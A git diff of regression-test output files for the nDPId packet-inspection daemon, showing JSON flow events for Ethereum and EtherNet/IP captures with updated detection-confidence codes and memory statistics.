+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1578508364932,"flow_last_seen":1578508365309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":1315,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":56639,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1578508364659,"flow_last_seen":1578508365043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":1158,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"40.67.144.128","src_port":56630,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":525,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.187.207.27","src_port":56621,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364382,"flow_last_seen":1578508364650,"flow_idle_time":200000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.138.108.67","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365751,"flow_last_seen":1578508365853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1396,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508366005,"flow_last_seen":1578508366135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":1439,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364422,"flow_last_seen":1578508365065,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578508365592,"flow_last_seen":1578508365773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1832,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1578508366020,"flow_last_seen":1578508366101,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508364522,"flow_last_seen":1578508365036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1241,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365009,"flow_last_seen":1578508365126,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"144.91.120.135","src_port":56641,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1578508364824,"flow_last_seen":1578508365152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":571,"flow_tot_l4_payload_len":1388,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"159.203.84.31","src_port":56634,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","packets-captured":2000,"packets-processed":2000,"total-skipped-flows":0,"total-l4-payload-len":86968,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":71,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":74,"total-idle-flows":74,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":432,"global_ts_msec":1578508366135} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2000/2000 @@ -438,9 +438,9 @@ ~~ total active/idle flows...: 74/74 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6013087 bytes -~~ total memory freed........: 6013087 bytes -~~ total allocations/frees...: 120410/120410 +~~ total memory allocated....: 6146721 bytes +~~ total memory freed........: 6146721 bytes +~~ total allocations/frees...: 123172/123172 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 1985 chars diff --git a/test/results/ethernetIP.pcap.out b/test/results/ethernetIP.pcap.out index 3d3f3eb2f..d8373b9b1 100644 --- a/test/results/ethernetIP.pcap.out +++ b/test/results/ethernetIP.pcap.out @@ -2,28 +2,28 @@ 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1352718180263} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7580000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1352718180263,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1352718180263,"pkt":"AAC80WDaeOfR4AJeCABFAAB6cCZAAIAGAACNUQAKjVEAU8RjrxLdiI2HlJVDUVAY+XQbbAAAcAA6AAABAhAAAAAAGjkvAAAAAAAAAAAAAAAAAAoAAgChAAQACRM1ALEAJgDkagoCIAIkAQIABgASAEwCIHIkAADOBAABAEwCIHIkACw9BAABAA=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7580000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180263,"flow_last_seen":1352718180263,"flow_idle_time":7580000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":1,"thread_ts_msec":1352718180263,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.83","src_port":50275,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1352718180264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1352718180264,"pkt":"eOfR4AJeAAC80WDaCABFAAAowW9AAEAGXmGNUQBTjVEACq8SxGOUlUNR3YiN2VAQD8bOTwAAAAAAAI1R"} 02070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1352718180264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1258,"pkt_l4_len":1224,"thread_ts_msec":1352718180264,"pkt":"AAC80WDaeOfR4AJeCABFAATccChAAIAGAACNUQAKjVEAU8RjrxLdiI3ZlJVDUVAY+XQfzgAAcAAsAAABAhAAAAAAGzkvAAAAAAAAAAAAAAAAAAoAAgChAAQAChU1ALEAGACvuAoCIAIkAQEABABMAiByJAAEggYAAQBwADoAAAECEAAAAAAcOS8AAAAAAAAAAAAAAAAACgACAKEABAAFCzUAsQAmAHuyCgIgAiQBAgAGABIATAIgciQAGLcEAAEATAIgciQAvFQGAAEAcAAsAAABAhAAAAAAHTkvAAAAAAAAAAAAAAAAAAoAAgChAAQABg01ALEAGAAHpAoCIAIkAQEABABMAiByJAAEggYAAQBwAKoAAAECEAAAAAAeOS8AAAAAAAAAAAAAAAAACgACAKEABAABAzUAsQCWABkzCgIgAiQBCgAWACIALgA6AEYAUgBeAGoAdgCCAEwCIHIkAHR\/BwABAEwCIHIkANiMBAABAEwCIHIkAITEBAABAEwCIHIkAAznBQABAEwCIHIkABh0BwABAEwCIHIkADS+BgABAEwCIHIkABDjBAABAEwCIHIkADQ\/BgABAEwCIHIkADS8BQABAEwCIHIkADTGBgABAHAA4gAAAQIQAAAAAB85LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAIFNQCxAM4AoxkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABAoQYAAQBMAiByJADc\/QUAAQBMAiByJAD0hgUABgBMAiByJAAs5QUAAQBMAiByJACYFAcAAQBMAiByJACkkwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJABQpQUAAQBMAiByJABY4wQAAQBMAiByJAC4xwcAAwBMAiByJAC0zwQAAQBwACwAAAECEAAAAAAgOS8AAAAAAAAAAAAAAAAACgACAKEABAADBzUAsQAYAHenCgIgAiQBAQAEAEwCIHIkAGiiBwAJAHAAwgEAAQIQAAAAACE5LwAAAAAAAAAAAAAAAAAKAAIAoQAEAAQJNQCxAK4Bf58KAiACJAEeAD4ASgBWAGIAbgB6AIYAkgCeAKoAtgDCAM4A2gDmAPIA\/gAKARYBIgEuAToBRgFSAV4BagF2AYIBjgGaAUwCIHIkAIx0BwABAEwCIHIkAKiiBwABAEwCIHIkAJg0BAABAEwCIHIkADgxBwABAEwCIHIkAChvBgABAEwCIHIkACiNBgABAEwCIHIkAAgQBgABAEwCIHIkANRpBwABAEwCIHIkAEB1BgABAEwCIHIkAPQcBgABAEwCIHIkAOwZBgABAEwCIHIkAIizBwABAEwCIHIkAOQgBgABAEwCIHIkAMgaBgABAEwCIHIkAGQ5BwABAEwCIHIkADi\/BgABAEwCIHIkACivBQABAEwCIHIkABwhBgABAEwCIHIkAEj1BQABAEwCIHIkAFT1BgABAEwCIHIkAAA8BgABAEwCIHIkAMRfBwABAEwCIHIkALCqBQABAEwCIHIkAKC1BgABAEwCIHIkAMT8BwABAEwCIHIkAMB0BgABAEwCIHIkAEzoBwABAEwCIHIkAGguBAABAEwCIHIkAHyvBQABAEwCIHIkALwJBgABAA=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7580000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1352718180265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180265,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1RAAEAGjEiNUQA\/jVEACq8SzXF9dCfmE+ef0VAYEACJaQAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAncYAgLEAHAAzNYoAAAACAAYADgDMAAAAAQAAAMwAAAAFAAAA"} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7580000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180265,"flow_last_seen":1352718180265,"flow_idle_time":7580000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1352718180265,"l3_proto":"ip4","src_ip":"141.81.0.63","dst_ip":"141.81.0.10","src_port":44818,"dst_port":52593,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1352718180265,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1352718180265,"pkt":"AAC8x85WeOfR4AJeCABFAAF0cCpAAIAGAACNUQAKjVEAP81xrxIT55\/RfXQoLlAY9kIcUgAAcAA6AAAFAhMAAAAAZsC+AAAAAAAAAAAAAAAAAAoAAgChAAQABy8uALEAJgDoRwoCIAIkAQIABgASAEwCIHIkABi3BAABAEwCIHIkADxUBgABAHAA4gAABQITAAAAAGfAvgAAAAAAAAAAAAAAAAAKAAIAoQAEAAMnLgCxAM4AUkkKAiACJAEOAB4AKgA2AEIATgBaAGYAcgB+AIoAlgCiAK4AugBMAiByJACUpgQAAQBMAiByJABEoQYAAQBMAiByJABc\/QUAAQBMAiByJAB0hgUABgBMAiByJACs5AUAAQBMAiByJACcFAcAAQBMAiByJACokwYAAQBMAiByJABstwQABABMAiByJAA8cgQAAQBMAiByJAC8oAQAAQBMAiByJADQpAUAAQBMAiByJABY4wQAAQBMAiByJAC8xwcAAwBMAiByJAC0zwQAAQA="} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1352718180276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1352718180276,"pkt":"eOfR4AJeAAC8x85WCABFAABwk1ZAAEAGjEaNUQA\/jVEACq8SzXF9dCguE+ehHVAYEADbwgAAcAAwAAAFAhMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQAlcYAgLEAHADoR4oAAAACAAYADgDMAAAAAAAAAMwAAAAFAAAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7580000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1352718180390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1352718180390,"pkt":"AAC8X0j6eOfR4AJeCABFAADqcEVAAIAGAACNUQAKjVEAK81yrxIurdArV0tI1VAY+M4btAAAcACqAAAEAhAAAAAAVgG6AAAAAAAAAAAAAAAAAAoAAgChAAQAASuWALEAlgBI5QoCIAIkAQoAFgAiAC4AOgBGAFIAXgBqAHYAggBMAiByJABI8gcAAQBMAiByJAAY8QQAAQBMAiByJABUPgUAAQBMAiByJAB42QcAAQBMAiByJAC8YQYAAQBMAiByJAAgzgQAAQBMAiByJAC8LgUAAQBMAiByJACcBgQAAQBMAiByJACwAQYAAQBMAiByJAD8DwQAAQA="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7580000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1352718180390,"flow_last_seen":1352718180390,"flow_idle_time":7580000,"flow_min_l4_payload_len":194,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":1352718180390,"l3_proto":"ip4","src_ip":"141.81.0.10","dst_ip":"141.81.0.43","src_port":52594,"dst_port":44818,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"EthernetIP","breed":"Acceptable","category":"Network"}} 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"ethernetIP.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1352718180392,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1352718180392,"pkt":"eOfR4AJeAAC8X0j6CABFAADAqJJAAEAGds6NUQArjVEACq8SzXJXS0jVLq3Q7VAYEAA2UAAAcACAAAAEAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgChAAQApcYAgLEAbABI5YoAAAAKABYAHgAmAC4ANgA+AEYATgBWAF4AzAAAAGC0GD\/MAAAAM1O1QswAAAC1P4xBzAAAAAAAAADMAAAAYLQYP8wAAAAAAKBAzAAAAAAAAEDMAAAAAAAAAMwAAAAAAAAAzAAAAAAAAAA="} 